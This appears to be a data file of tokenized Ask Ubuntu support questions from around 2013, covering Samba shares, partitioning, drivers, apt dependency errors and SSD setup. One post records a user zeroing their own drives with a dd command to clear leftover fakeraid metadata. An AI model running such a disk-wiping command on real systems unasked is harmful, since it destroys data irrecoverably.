258257	preventing a specific application from accessing a folder	i just installed an application that has the bad habit of automatically scanning all my folders for files to edit . the app has no available options to disable this behavior . i can not just remove read/list permissions for those files because the app runs with my user permissions , and i still want other applications to be able to access them . is there a security mechanism to prevent the application from being able to read some folders ? i tried using apparmor , but since it is `` default deny '' there does n't seem to be a way to say `` allow the app to do everything it wants except access these files '' . thanks .
258259	advantages of separate /home partition on hdd + ssd setup	i have a brand new ssd and would like to optimize my ubuntu 12.10 installation for best speed and durability of device . from what i know , there should always be a lot of free space in an ssd , and write operations should be kept to a minimum . since i always tend to have a lot of junk in the documents/pictures/music/download folders , i was wondering if it would be a good idea to mount /home on a separate hdd , or to just change the directories for documents/pictures/music/download by editing the $ home/.config/user-dirs.dirs file . what would be the performance cost with the first method ? are there any important system files in /home that need to be frequently acessed to ? ( right now i already am mounting /tmp in ram and using it for firefox cache )
258263	can i have a live ubuntu usb with a partition for persistent mode , and have a partition that allows me to store windows files , on the same drive ?	my question is , on one flash drive , can i have 3 partitions which are 1 : the live usb partitions ( about 4gb ) 2 : casper-rw partition of persistent mode ( another 4gb ) ^ those two are both created by the live usb program 3 : a third partition which allows me to use the flash drive like a normal flash drive , for carrying windows files around . ( the remaining 20` gb ) is it possible to have both file systems on the drive , and if so , how do i make this ? the program i 'm using for the live usb is livelinux
258264	trackpad not working on thinkpad after upgrade- help ?	relevant info : thinkpad w530 precise 12.04.2 $ uname -a linux revolt 3.2.0-38-generic-pae # 60-ubuntu smp wed feb 13 13:47:26 utc 2013 i686 i686 i386 gnu/linux after allowing a system update ( i was already on 12.04 so i think it was maybe just some packages that wanted to be upgraded and maybe the kernel but i did n't really pay attention ) , for some reason my computer deleted x and also deleted my nvidia drivers , going from happy ubuntu to just a shell login . i reinstalled x , and then installed nvidia-current , so my computer was kind of back to normal , except that the trackpad does n't work anymore . the nipple mouse works fine , as do external mice , and my wacom tablet , and the trackpad 's buttons also still work , just not the trackpad for moving the mouse . i read this https : //wiki.ubuntu.com/debuggingtouchpaddetection and do n't think it 's a kernel bug because cat /proc/bus/input/devices shows i : bus=0011 vendor=0002 product=0007 version=01b1 n : name= '' synps/2 synaptics touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input17 u : uniq= h : handlers=mouse1 event17 b : prop=9 b : ev=b b : key=6420 0 30000 0 0 0 0 0 0 0 0 b : abs=2608000 11000003 and $ xinput list-props `` synps/2 synaptics touchpad '' device 'synps/2 synaptics touchpad ' : device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 243 ) : 0 device accel constant deceleration ( 244 ) : 1.000000 device accel adaptive deceleration ( 245 ) : 1.000000 device accel velocity scaling ( 246 ) : 10.000000 device product id ( 238 ) : 2 , 7 device node ( 239 ) : `` /dev/input/event17 '' evdev axis inversion ( 247 ) : 0 , 0 evdev axis calibration ( 248 ) : < no items > evdev axes swap ( 249 ) : 0 axis labels ( 250 ) : `` abs mt position x '' ( 284 ) , `` abs mt position y '' ( 285 ) , `` abs pressure '' ( 278 ) , `` abs tool width '' ( 283 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 251 ) : `` button left '' ( 124 ) , `` button unknown '' ( 241 ) , `` button right '' ( 126 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) evdev middle button emulation ( 252 ) : 0 evdev middle button timeout ( 253 ) : 50 evdev third button emulation ( 254 ) : 0 evdev third button emulation timeout ( 255 ) : 1000 evdev third button emulation button ( 256 ) : 3 evdev third button emulation threshold ( 257 ) : 20 evdev wheel emulation ( 258 ) : 0 evdev wheel emulation axes ( 259 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 260 ) : 10 evdev wheel emulation timeout ( 261 ) : 200 evdev wheel emulation button ( 262 ) : 4 evdev drag lock buttons ( 263 ) : 0 if i go into system settings > mouse and touchpad there is no touchpad tab . however , if i do sudo cat /dev/input/event17 i can see that the trackpad is producing output . if i try to install additional drivers through the additional drivers program it only shows that nvidia drivers are available and i have them already installed . i do n't remember having to install anything in particular before to have the trackpad work . i reinstalled everything related to xinput for good measure to no effect . please let me know if you have any tips ! my two finger scrolling was so nice before ! thanks nadya
258269	connecting to the internet via usb on ubuntu 12.10 issue	yesterday the connection worked now when i plug in my iphone its displaying the connecting icon then stops and carries on . i have no internet connection ; only my phone , which means i ca n't install packages . what do i need to do ?
258270	fatal error after installing steam	i normally play team fortress 2 via steam on windows 7 , but because of the adorable penguin i installed ubuntu ( 12.10 ) . i had i hard time installing steam , but eventually i did it . after that i installed team fortress 2 , which took a long time but i managed that too . so when i finally wanted to play to get my beloved penguin , i got this error when i wanted to start steam : fatal error : steam failed to load : *steamstartengine ( 0xffde5c90 ) failed with error 1 : cmultifieldblob ( pserialized ) : patrial field header at end of record please help me to get my penguin : )
258271	error 504 while accessing a php page from internet	i 'm trying to access to a test website from internet but i mostly get 504 errors . any php pages take long time to show , when they show . my web server is an ubuntu server 12.10 on a virtual machine with apc and lamp installed ( php 5.4 ) , with network mode bridge . i can access html pages but not php ones ( i tried with a basic phpinfo ( ) file ) . i 've set up a dynamic dns with no-ip . it 's configured in my router ( freebox ) . from my local network it works perfectly by the domain name but never when anyone tries to connect from anywhere else through internet . i do n't have any firewall on the virtual machine , and i 've forwarded port 80 to it . any ideas ? thanks for your help ( and sorry for my english ... )
258272	how to install audacity 's manual ?	i am trying to find the audacity folder so i can add the manual to it so i do n't have to use online resources for help . i ca n't find where ubuntu 12.04 stores the applications folder ( as in a mac )
258275	i want to install ubuntu 12.10 alongside windows 7 . i have its setup . when i installed it , it shows an error	the error says that it is unable to find a medium containing a live file system . please can i get a solution to this problem .
258281	will location data be available to ubuntu mobile apps ?	is ubuntu planning to make location data available to mobile applications ? if so , can you give any pointers to an api that i could use ?
258283	ubuntu for tablets has been announced : is it related to htc one 's announcement ?	wo n't i be able to download and install ubuntu on other tablets like samsung galaxy tab or micromax funbook ? if i can , what was the relation between the timing sync between htc and ubuntu ? edit : my question is mainly to clarify the role of htc behind the release of ubuntu for tablets . this question addresses similar issues about ubuntu for phone . though the os 's are the same , its the difference in interface that distinguishes both of them .
258284	setting up an anonymous public samba share to be accessed via windows 7 and xbmc	so i should start by saying that i did this successfully less than a week ago and i had no trouble but i have since reformatted and reconfigured my server and now i 'm having the hardest time remembering how i did it . here 's what i had before and what i am trying to accomplish again . i had a public samba share on ubuntu server . anyone on my network could access the share and it 's contents simply by typing \hostname . no password necessary . users who were not on the share 's workgroup had read access but users who were on the workgroup had read/write access . ( windows 7 ) now , if i try to connect to \hostname i 'm prompted for a username and password . if i enter the un pw i get full access but i should n't have to ; my current settings are ... security = user map to guest = bad user [ shares ] path = /home/shares available = yes read only = no browsable = yes public = yes writable = yes guest ok = yes i 'm pulling my hair out over this one . any suggestions ? edit : ugh , this is giving me such a hard time . i 'm so close . here 's what i 've got . i can get to the share from windows 7 by going to start and typing \hostname\sharename but i 'm prompted for a username and password . i cant just leave it blank though because it will use my workgroup as the domain ; so i enter \ for the username to clear it out and log in with a blank username and password . great now i can access the files in the share . once i 'm in , the workgroup configuration is working properly . if i 'm on a computer with the the default workgroup i can read and execute ; a computer on my home workgroup can read write and execute . so that 's working . the problem is , it should n't be asking for a password at all . it should be totally public to anyone on the network . i 'm trying to share it with xbmc and it 's not even showing up under smb in the file manager . i cant access it manually from xbmc either . i get a connection refused error . still pulling hair out over this . the worst part is the first time i did this about a week ago , i spent about 30 minutes on it and it worked perfectly . now i 've probably spent at least 4 hours and it 's still not working . testparm : load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ printers ] '' processing section `` [ print $ ] '' processing section `` [ shares ] '' loaded services file ok. server role : role_standalone press enter to see a dump of your service definitions [ global ] workgroup = fellowship server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 socket options = tcp_nodelay so_rcvbuf=8192 so_sndbuf=8192 dns proxy = no wins support = yes usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers [ shares ] path = /home/shares read only = no guest ok = yes update : so , the share is now available across my network regardless of the work group . any windows user who connects to my network can see the nas under netowork and access it . the key was setting security to security = share . i know , it 's deprecated , but it works and security = user and map to user = bad user was n't working for me . anyway , now it seems that anyone who connects to the share get 's unix global permissions for the directory , which is manageable , but i want users that are joined to the workgroup specified in smb.conf to get unix group permissions . this way , i can set the directory to 775 and i will be able to write because i am joined to the workgroup but other users can only read and execute .
258285	ubuntu 12.10 . ca n't format root partition at installation time	i 'm trying to install ubuntu 12.10 on a supermicro storage server and have an issue . i am using alternate ( text-based ) installation cd image and when i get to the detect disks section it says there is a s/w raid on the device and asks me whether i want to activate it . i select no and proceed to manual partitioning . there i create a new partition table on the target device , create partitions and so on , but when i select write changes to disk it gives an error that it is not able to format /dev/sda1 ( root ) . i tend to think that it has something to do with that s/w raid i do n't even have ! from the current system ( debian etch ) i have searched for that array , but have not found any . cat /proc/mdstat - nothing mdadm -as - no arrays found cat /etc/mdadm/mdadm.conf - no arrays there mdadm -e /dev/sda ; mdadm -e /dev/sda1 - nothing the reason i 'm talking about this raid array is because there was some other system i was not able to install ubuntu on that also detected some array . i ca n't remember exactly , but on that former system there actually might have been some s/w raid , but i was not able to remove it whatever i did : clear superblock , may be even dd . edit 1 so , i 've managed to get rid of ata raid . i knew forehand that there was no h/w raid on the server , but as it turned out it has a fakeraid/hostraid ( not linux s/w raid as i thought previously ) . here is what i 've done in my case ( for reference purposes ) : tried to delete the array using bios-level utility for raid management , but to no avail , since it did n't find any arrays already present . wipe out metadata from the drives using current os installation and with execute a shell section during ubuntu installation : dmraid -r -e. that resulted in errors and failed to delete metadata . finally , i ended up with clearing the first and last gbs of each drives with dd : dd if=/dev/zero of=/dev/sdb bs=1gb count=1 dd if=/dev/zero of=/dev/sdb bs=1gb seek=999 ( 1 tb drive ) i thought i 'd be good now , but no ! as i 've mentioned it does not detect any raid arrays anymore , but i still can not format the partition . i 'm using a fromlinux approach to installation , where i have hd-media files : vmlinuz and initrd.gz to boot with and an installation iso . i 'm installing to sda , have the iso on sdb and tried to put the above 2 files to either sda or sdb , though i think it does n't matter after they are loaded into ram . regardless though of the drive i start the installation from - sda or sdb , i can create partitions on sd [ bc ] , but not sda . edit 2 this time i have tried to install ubuntu on a pre-partitioned drive with existing empty filesystems , meaning a have chosen keep existing data at partition disk section ( indicated with k flag ) . everything seems to be fine . it informs me that system directories on unformatted root will be deleted and such , but at the final step it says that it fails to remove existing data , even though there is no data there ( it is a clean partition ) ! it seems as if the drive was read-only or busy . when i try to format it with mkfs.ext3 /dev/sda using command prompt available during installation it says : /dev/sda2 is apparently in use by the system ; will not make a filesystem there . any ideas , please ?
258287	not able to boot sda	i was using ubuntu 12.04.1 64bit , but i 'm not able to boot /dev/sda . i tried to install grub , but i could n't . my questions are do i have to re-install . can i fix the `` /dev/sda '' as before i used . i put cat and fdisk -l ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004c895 device boot start end blocks id system disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0000bee1 device boot start end blocks id system /dev/sdb1 2048 3907029167 1953513560 83 linux disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0c1b08eb device boot start end blocks id system /dev/sdc1 2048 3907029167 1953513560 83 linux ubuntu @ ubuntu : ~ $
258288	trouble setting up git error : could not lock config file	i 'm getting this error when trying to set the global config : $ git config -- global user.name `` your name here '' error : could not lock config file /pathto/file/.gitconfig : no such file or directory and the file .gitconfig is already exists , anyone have any ideas ? ?
258292	nexus 7 does not goes past ubuntu boot up screen !	installing ubuntu on my nexus 7 . pc showed success message and then i waited for few minutes some white text and then boom.. ubuntu logo . after that the device went blank ... now when i boot i see google logo and after that ubuntu logo with white and red dots and then nothing happens . again blank . did i miss something ?
258293	is it possible to write a mobile app with a engine written in c ?	i am working on a chess engine which is written in c ( ttps : //launchpad.net/enpassant ) . by the time it is completed , i plan to have different versions for the desktop and mobile . now , is it possible for me to have a gui written with the help of the ubuntu mobile sdk while uses the c engine internally ?
258294	does ubuntu support php ?	i was on fedora and tried to use php but i was having a really hard time trying to use it so i 'm switching to ubuntu since it is important that i 'm able to code php . on fedora , i could n't write to the www directory of my server and got little support from the people at fedora . before i switch , i just want to make sure i wo n't have this problem on ubuntu and wanted to check whether i should get server or desktop and then install lamp . i wo n't be using this computer as a server , but i need to code php on it . thanks for your time .
258296	ubuntu 12.04 vnc server with java client	i 'm trying to setup a machine that i can admin remotely using vnc and i 'm a tad stuck the particulars : these machines are inaccessible after they 've been setup and as i need to set up a lot of them , i 'd like to be able to do as much ( if not all ) of the setup through ssh i need to be able to connect to them via a java-based client . i 've managed to get this to work using this guide ( http : //hartlessbydesign.com/blog/view/195-how-to-set-up-a-vnc-web-java-client-for-ubuntu.html ) but i have to use the built-in vnc server package which is awful and i do n't know how to configure it for better performance i need to be able to interact with the default session ( is that the correct term ? ) over vnc , i.e . i need to be able to control the session you would see if you were sat in front of the machine , not an alternative session does anyone know how to either improve the performance of the built-in package or install and configure an alternative ? thank you
258297	should i always restart the system when i see `` system restart required '' ?	these two nice se posts ( 1 , 2 ) comment on restarting one 's ubuntu machine but they leave me with a few questions : how do you actually do the restart ( i 'm a beginner and using 12.04.1 lts ) ? should i always restart the system when prompted to ? does restarting the system affect access to it via ssh or there any other caveats one needs to think about before doing this ?
258302	able to access shared files on ubuntu from windows only when i ping the ip from ubuntu	i shared a folder from the shared options of the folder allowing guest access . if i try to open this folder ( or my ubuntu system ) from my win7 system using the ip or the hostname , i get an error . but if i ping my win7 ip from my ubuntu and then try accessing ubuntu ip over the network it suddenly starts working ... but only for a short while or until the ping continues . note , however , that at this point opening my ubuntu system using \\ubuntusys from win7 still does n't work ! why is this happening and how do i fix this ?
258304	what packages on ubuntu server 12.04.1 are need ?	after i had some troubles with apt-get i added too much packages with the ubuntu-desktop package . unfortunately , this happened on a ubuntu-server , so there are many unused packages now . because i 'm still a noob in ubuntu , i got a question : what packages on ubuntu server 12.04.1 are need for a proper running server ? thx for answers , if someone is interessted here 's the list of my packages ( output of dpkg -- get-selections ) : http : //pastebin.com/c8ba0yrp thx for answers and sorry for my bad english .
258306	will there be x86 builds of ubuntu tablet / phone ?	while there is plenty of buzz for ubuntu touch / ubuntu phone builds for nexuses , are there any images ( if at all ) coming for the normal x86 platform . i am particularly interested in the ubuntu tablet developer images . what is the official ubuntu response regarding this platform ?
258307	setting a username and password on smtp	i just setup a mail sending using exim . i tested and it works . however , it seems that even if i do n't put username and password of smtp server on phpmailer field the sending of mail works . how can i enforce a username and password on my smtp server ?
258312	ubuntu 12.04 server as vmware guest : unable to ping and access apache from host	this may be just some configuration in my ubuntu setup and may not anything to do with vmware workstation but i thought to give all the info . i have a win 7 'host ' workstation running vmware workstation with an ubuntu server as 'guest ' . the vmware network is vmnet0 ( auto-bridging ) for the ubuntu vm . the guest os is getting its own ip from the corporate network and is able to surf to web . the guest os can also access the host 's website just fine . so far so good . but i need to be able to run a lamp environment in the guest . i have apache installed on the guest and and in both http : //localhost and http : // [ hostnameofguest ] the apache web page shows up fine in the guest 's firefox . but typing http : // [ hostnameofguest ] or even http : // [ guestipaddress ] inside the host does not bring up anything ; ping to guestipaddress does work but ping to hostnameofguest does not work inside the host machine . this is probably not a firewall issue -- i i have that disabled ( using firestarter , i think ) otherwise even ping to guest ip should n't work ? /etc/hosts looks like : 127.0.0.1 localhost 127.0.1.1 customhostname any idea how i can make the lamp environment to work > thanks !
258313	how can i log into an existing remote session using freenx ?	i successfully installed freenx server and the qtnx client . when i connect to the server , the screen does not reflect my current desktop on the server , but a newly spawned session . how can i have freenx show me the existing state of the desktop on the server instead ?
258314	gpg error , ca n't update 12.04	i have seen the following question , however it does n't solve my problem : update manager error - authentication error i ca n't update my ubuntu 12.04 ! i get the following error after running sudo apt-get update : e : gpg error : http : //http precise/ release : the following signatures were invalid : nodata 1 nodata 2 following is the content of /etc/apt/sources.list : # # # # # # ubuntu main repos deb http : //mirror.informatik.uni-mannheim.de/pub/linux/distributions/ubuntu/ pr $ deb-src http : //mirror.informatik.uni-mannheim.de/pub/linux/distributions/ubuntu $ 3rd party binary repos # # # # google chrome browser - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key. $ deb http : //dl.google.com/linux/chrome/deb/ stable main what i have tried so far : i have tried changing sources and made a new , clean /etc/apt/sources.list file . but the issue still persists . running sudo rm /var/lib/apt/lists/* -vf does n't help either . how do i resolve the issue ?
258315	usc does not include fresh apps	i am using ubuntu 13.04 64 bit and i have a problem with ubuntu software center ; basically it fails to find new apps . for example i read an article on omgubuntu.co.uk such as `` ... was added to usc '' and try to find it . but i can not find it . lightread , fogger , stormcloud etc . additional notes : that is not about updating or ubuntu 13.04 being in process . i have been using ubuntu for a very long time and that was always the problem .
258322	is qml the only way to create apps in ubuntu for tablets ?	as i 've seen from the tutorials , qml seems the only way to create graphical apps in ubuntu for tablets . other languages seem to be only for using opengl , not qt libraries . my question can be rephrased as : can i grab some linux c code and compile it in ubuntu for tablets ?
258323	mozilla thunderbird is not showing my emails correctly	my email client thunderbird does not show my emails completely , even the messages that i write down on my composer when trying to send a new mail . what can i do to solve this problem ? attached ( hyperlinks ) you will find some pics i uploaded , so you can get what i meant . hope i can get some help from you all . thanks in advance . new mail mail composer
258324	all os ( pre-installed window 8 ) gone after installing ubuntu 12.10 ( partially installed )	few days back i bought a new `` toshiba satellite l855-s5112 '' laptop . i was just trying to install ( partially installed ) a ubuntu 12.10 along with existing windows 8 ( pre-installed with this laptop ) . by mistake i just started to install the new os in same partition but in between i terminated the installation process . now i am not able to boot with any os . help me to recover it with factory installation . just tell me the step by step process so that i can get recover it . i have n't created the media for recovery .
258326	how can i search for a public wifi hot spot ?	how can i search for a public wifi connection ? i can connect to the wireless router at home which i used during the installation of lubuntu perfectly fine but when i visit the library i 'm forced to run windows 7 in order to connect to the wifi internet . i can not find any way in network connections > wireless to search for a signal . when lubuntu starts it says that connections are available but i can not find anywhere to view said connections . please help , thanks .
258329	can ( and how do ) you install ubuntu in f2fs filesystem ?	f2fs is a file-system optimised for use in nand memories ( ssds , usb flash drives , memory cards , etc ... ) . you can read a more complete information here . is it possible to install ubuntu in it ? . does the installer support it ? . any caveats ?
258330	ubuntu server 12.04 dependency issues when attempting update	i 'm having issues updating packages on an ubuntu server instance running 12.04 . when running apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.37.44 ) but 3.2.0.38.46 is installed depends : linux-headers-server ( = 3.2.0.37.44 ) but 3.2.0.38.46 is installed e : unmet dependencies . try using -f. when using apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.37.44 ) ; however : version of linux-image-server on system is 3.2.0.38.46. linux-server depends on linux-headers-server ( = 3.2.0.37.44 ) ; however : version of linux-headers-server on system is 3.2.0.38.46. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
258333	problems with network connetion after update to kernel 3.5.0-24	after release of ubuntu 12.04.2 i tried update my system with : sudo apt-get install linux-generic-lts-quantal xserver-xorg-lts-quantal unfortunately after that my network was not working . it just started infinity reconnection loop . with something like this in syslog : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) looks like problem in new e1000e kernel embedded driver because when i downgrade to 3.2.0-38 all worked fine . my hardware is thinkpad x230 with core i7 . lspci -v 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) subsystem : lenovo device 21f3 flags : bus master , fast devsel , latency 0 , irq 42 memory at f2500000 ( 32-bit , non-prefetchable ) [ size=128k ] memory at f253b000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at 5080 [ size=32 ] capabilities : < access denied > kernel driver in use : e1000e kernel modules : e1000e now i work with older kernel . but i have good reproduction of this problem and i can provide any needed additional info . so maybe i can help solve this issues but i have no ideas how .
258339	how do i set ubuntu to my default boot ?	i have windows 7 and 8 installed on my laptop , i just installed ubuntu . it normally boots up in windows 8 , how do i change that ?
258341	how to paste files in jre folder ?	i am trying to copy .jar and .so files into jre folder . i tried to do it like i do it in windows but it is not working , maybe the permission problem . so how can i do it ? using terminal or is there any other way ? file which i want to copy is rxtxcomm.jar path is /home/adi and i want to paste it in jre path is /usr/lib/jvm/java-7-oracle/jre/lib/ext i am very new to linux , i got it only couple of hours ago so please bear with me !
258342	in a multitouch environment keeping multiple windows active at the same time	i want to use big touch screen yes really big around 32 inch or bigger as multi user screen ( just like the one introduced by lenovo if you check their latest offering ) currently screen has support upto 10 point multi touch . current issue i am facing in usability of this setup is only one window is active at a time in ubuntu desktop os . but this is not suitable for a multi user interface cause when one person clicks other persons window will loss focus . is there any work around for this issue ? also currenty we an rotate entire display but not by each app windows is that possible ? also can we stack unity in all four edges ? i mean currently we have it on left side only so on a monitor kept horizontally we will require it on all four edges for users to access it .
258343	will developers be able to use ruby or python for apps on ubuntu mobile ?	will we be able to use python , ruby or other languages to develop apps for ubuntu tablets and phones ?
258348	good practices for updating a server ? [ without affecting current running services ]	there are some servers that have a task delegated to them . for instance , imagine a scenario where there are web servers , data servers etc . that together provide a service to a client . now how should i make sure the servers are up to date with new software package releases without blindly choosing an automatic update option ? i may not be able to shut down a server for an update . how can i know that which update will affect what all running processes in the system , so that if the update affects a critical process pertaining to a service , i can deny that particular update or re-schedule it for some other time ? -- edited part -- my main focus is that the running service should not be affected , while the security updates for that service should be informed to the admin pc connected in lan . also all those updates that do not affect the running service should be automatically updated .
258357	replace ubuntu 12.10 with 12.04	i 'm new to these forums , and i do n't really know how to code etc , so i 'm going to need to have really basic instructions . i decided my pc was n't fast enough for windows 7 and i wanted to put ubuntu on . i made a live cd and booted to it . after a while the mouse would stop working , and i would need to navigate with the keyboard . this was n't much of a problem , as i could easily navigate without the use of a mouse . the installation took a long time ( over 12 hours ! ) and hung at 'running `` update grub '' ( or something like that ) i cut the power to my pc , and it turned on into the ubuntu bootloader fine , with the option of either windows 7 or ubuntu 12.10 i booted ubuntu and it would n't properly boot , as it was in low graphics mode . this is where i want the help . i 'm sure it 's fixable , but by the looks of things ubuntu 12.10 could hold more problems in store for me and my graphics chip . what i really want , is too be able to install ubuntu 12.04 instead of ubuntu 12.10 , not next to it . i 'm not bothered if it needs to destroy all ubuntu data , but i really ca n't have it messing up windows 7. one last thing , i have no installation disk for any copy of windows , as this is an old pc my mate gave me . i do n't know anything about the manufacture , and i do n't think it has warranty . key facts : want to install ubuntu 12.04 , instead of ubuntu 12.10 has no installation disk for any copy of windows thanks people !
258358	i 'm very skeptical about installing ubuntu over my existing windows 7 os . as a first time user i have no experience with any linux software	okay , so i am very nervous about wanting to install ubuntu onto my pc , i do n't want to potentially delete my current windows 7 os , and as a first time user i have no experience whatsoever with linux . i urge the ubuntu community to assist me in this matter as i do not want to make any mistakes that may potentially jeopardize my system . i have a 64-bit version of windows 7 if that helps with the answer to this question . thank you .
258359	netpbm pam image format support not working	the netpbm pam documentation suggests that i will have a fairly seamless transition if i choose to start using pam instead of ppm/pgm/pbm as an image format : '' pam '' is in fact a fourth format . but it is so general that you can represent the same information in a pam image as you can in a pbm , pgm , or ppm image . and in fact a program that is designed to read pbm , pgm , or ppm and does so with a recent version of the netpbm library , will read an equivalent pam image just fine and the program will never know the difference . [ updated : 09 october 2005 ] note : the above comment is also included in man pam on the systems that i am having trouble with . however , when i run netpbm utilities on ubuntu ( several versions including 12.10 ) , it does not work as advertised : $ pnminvert p7 pnminvert : bad magic number - not a ppm , pgm , or pbm file i have verified that some other distributions , as well as from-source builds of netpbm-super-stable ( also stable , advanced ) , do not have this problem . it looks like from the packages page , that this package is being updated periodically , so i ca n't figure out why the ubuntu versions would n't work . i want to deploy tools based on this to an arbitrarily large number of machines , so build-from-source is n't appealing . any ideas about how to make this work on ubuntu ?
258361	convert several png to one pdf	i have 280 pgn files that i want to merge and convert into one pdf . png files names are in the sequence p000.png , p001.png etc and total space is about 30mb . i did : convert p00*.png to myfile.pdf and it worked fine . luckly enough in the right order . but when i do : conver p*.png to myfile.pdf it consumes all my 4gb of memory and half my swap . then it crashes with the error convert : memory allocation failed `myfile.pdf ' @ error/pdf.c/writepdfimage/1595 . any idea of how to make a workaround to this problem ? i think that a good enough solution would be to use convert one file at a time to pdf , with the same name . then use pdfunite or pdftk to merge them . but i do n't know how to use convert in this way .
258364	12.04.2 - after the last update my qualcomm atheros gigabit ethernet driver is lost	after the last update the driver is lost . i have tried hard ( several nights ) to get it running . now with the last update it 's gone . any thoughts why this is not supported natively ? what is the best way to get it back ?
258367	12.04.2 nvidia driver issue ?	i just installed 12.04.2 and i 'm stuck with 1024x768 resolution on my gtx560 . impossible to change the resolution ; the native resolution ( 1680x1050 ) is not detected . any clue ? thanks . the additional drivers panel does n't show any driver to install , so i kept the original driver . here is the xrandr output anyway : screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-2 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 430mm x 270mm 1024x768 75.0*+ 60.0 800x600 75.0 60.3 640x480 75.0 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 disconnected ( normal left inverted right x axis y axis )
258372	problem running lazarus project on ubuntu 12.04	i recently installed lazarus ide on my ubuntu 12.04 via software center , later i tried it via commands in console . both were effective , program was successfully installed but i was unable to run my projects ( the program was able to compile the code but there was no window with result of code ) . after clicking run , it shows me a message box with name invalid launching app and the following text : launching application `` '' /media/windows/lazarus/19.2/project1 '' '' does n't exist or is unable to launch . look launch - > parameters of launch - > local so i checked the setting , in local i allow the launching app . when i run it again it just showed me this text in terminal : /media/windows/lazarus/19.2/project1 /usr/lib/lazarus/0.9.30.2//tools/runwait.sh : 16 : /usr/lib/lazarus/0.9.30.2//tools/runwait.sh : /media/windows/lazarus/19.2/project1 : permission denied -- -- -- -- -- - note : windows is just the partition name on my hardisk .
258373	is .config called other things for different system languages ?	i 'm making an application that reads/writes to files in the ~/.config folder ; however , i want to make sure it works under all systems . is .config called other things for different system languages ? is there a better way of accessing its value than using a hardcoded .config string ? ( a la an environment variable ) what is the best practice for this ? if there is no established best practice , what is the simplest approach that guarantees the desired result ?
258374	the windows installation tool ( wine )	if i use the tool on the hard drive where windows is installed will it damage the windows os or will it create a new partition ?
258384	where are bluetooth received files saved	i have used blueman and the default bluetooth manager an every time i accept the file transfer from the phone to the pc , it shows that it is transferring and even notifies me that the transfer was successful but i can not find the image anywhere . where are files stored after sending them via bluetooth to the pc ? i already checked my home folder . the picture folder which i thought it would be the one for images . then the document folder and afterwards i did a huge check on all folders under /home . no luck . is nowhere . i even checked this answer with no luck .
258386	accessing a window	while working i need to pull some windows on regular basis . now i switch between window using alt + tab or alt + ` . some windows i need more frequently than others . i want to have key combination to pull these frequent windows . is there way to do it ?
258392	ubuntu on my computer	i just want you to say me if ubuntu would run smoothly ( i meam , not without too much lags and freezing ) on my computer . here are the specs : intel pentium 4 cpu 2.40 ghz , 512 mb ram , intel 82845g/gl/ge/pe/gv grpahics controller now , i´m runnig windows xp , but it´s not smooth enough can you help me ? tank you very much : )
